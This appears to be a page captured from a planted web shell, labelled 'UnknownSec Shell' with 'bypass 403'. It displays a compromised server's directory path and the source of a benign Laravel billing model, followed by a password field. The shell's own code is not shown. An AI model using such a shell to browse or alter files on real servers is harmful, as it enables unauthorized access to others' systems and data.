shell bypass 403

UnknownSec Shell

: /home/bouloter/infix/app/ [ drwxr-xr-x ]

name : BillingDetails.php
<?php

namespace App;

use Illuminate\Database\Eloquent\Model;

class BillingDetails extends Model
{
    protected $connection = 'mysql';

    protected $guarded = [];

    public function country()
    {
        return $this->belongsTo(Country::class, 'country');
    }

    public function countryDetails()
    {
        return $this->belongsTo(Country::class, 'country');
    }

    public function stateDetails()
    {
        return $this->belongsTo(State::class, 'state')->withDefault();
    }

    public function cityDetails()
    {
        return $this->belongsTo(City::class, 'city')->withDefault();
    }
}

© 2025 UnknownSec
afwwrfwafr45458465
Password